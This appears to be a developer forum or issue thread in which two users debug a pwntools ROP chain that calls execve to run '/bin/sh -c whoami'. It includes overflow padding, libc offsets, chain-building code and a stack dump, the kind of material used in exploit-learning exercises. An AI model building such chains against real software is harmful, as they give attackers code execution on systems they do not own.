ROP.call execve syscall ignores parameter

[rommarius]

wasn't able to spawn a shell with command as parameter:

bin_sh = libc.address + 0x111111
rop = ROP(program, base=0x7fffffffe460)
rop.call('execve', [bin_sh, [[b'/bin/sh'], [b'-c'], [b'whoami']], 0])
chain_1  = b''
chain_1 += b'\x00'*136 # chain_1 += b'B'*6
chain_1 += rop.chain()

when i use SROP with write what where gadgets to build a arbitrary string in memory i'm able to spawn a shell but i failed to build an array for the rsi register argv[].
is there any better explaination?

[rommarius]

[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe580 --> 0x7fffffffe5a0 --> 0x0
0008| 0x7fffffffe588 --> 0x68732f6e69622f ('/bin/sh')
0016| 0x7fffffffe590 --> 0x242424242400632d ('-c')
0024| 0x7fffffffe598 --> 0x2400696d616f6877 ('whoami')

[Arusekk]

Remember to null-terminate your argv. Hope that helps.

rop.call('execve', [b'bin_sh', [[b'/bin/sh'], [b'-c'], [b'whoami'], 0], 0])

EDIT: I wrote sth about double brackets, but I was wrong. Sorry for confusion.

[rommarius]

thank for the fast response:
but it seems here that the 0 at the end is interpreted as parameter!
spaws a shell but getting this error:

whoami: 0: cannot open : No such file

[Arusekk]

Please paste your full code, I think you used b'0' instead of 0.

[rommarius]

hey it seems that the -c parameter gets ignored, can someone explain me why? the stack seems looking correct.

bin_sh    = libc.address + 0x1cb42f
system    = libc.address + 0x0000000000050d70

rop = ROP(program, base=0x7fffffffe400)
rop.call('execve', [bin_sh, [[bin_sh], [b'-c'], [b'whoami'], 0], 0])
chain_1  = b''
chain_1 += b'\x00'*136 # chain_1 += b'B'*6
chain_1 += rop.chain()
print(rop.dump())

getting this error /bin/sh: 0: cannot open whoami: No such file

when i type in my terminal /bin/sh whoami gettiing the same error that why i think the -c parameter gets ignored for unknown reason. my argv is still null terminated without i would get SIGSEGV.